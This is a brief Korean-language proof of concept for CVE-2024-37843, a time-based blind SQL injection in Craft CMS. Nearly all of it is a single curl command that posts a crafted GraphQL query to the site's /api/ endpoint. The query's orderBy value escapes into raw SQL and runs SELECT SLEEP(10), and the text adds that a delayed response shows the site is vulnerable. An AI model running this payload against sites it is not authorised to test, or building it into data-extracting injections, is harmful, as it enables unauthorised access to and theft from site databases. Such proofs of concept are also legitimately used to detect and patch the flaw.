
CVE-2024-37843에 대한 POC. Craft CMS 시간 기반 블라인드 SQLi
CVE-2024-37843에 대한 POC입니다. Craft CMS 시간 기반 블라인드 SQLi
curl -X POST '<URL>/api/' -H 'Content-Type:application/json' -d '{"query":"query IntrospectionQuery {assets(orderBy: \"`assets`.`volumeId` -- \\\\` \\n \\n LIMIT 5) AS `subquery`\\nINNER JOIN `assets` `assets` ON `assets`.`id` = `subquery`.`elementsId`\\nINNER JOIN `volumefolders` `volumeFolders` ON `volumeFolders`.`id` = `assets`.`folderId`\\nINNER JOIN `elements` `elements` ON `elements`.`id` = `subquery`.`elementsId`\\nINNER JOIN `elements_sites` `elements_sites` ON `elements_sites`.`id` = `subquery`.`elementsSitesId`\\nINNER JOIN `content` `content` ON `content`.`id` = `subquery`.`contentId`\\nORDER BY `assets`.`volumeId`; SELECT SLEEP(10) ; --\", limit: 5){filename}}"}'
SLEEP(10) 값을 필요에 따라 조정할 수 있지만, 이 curl 요청에 대한 응답 시간이 10초를 초과하면 API가 취약한 상태입니다.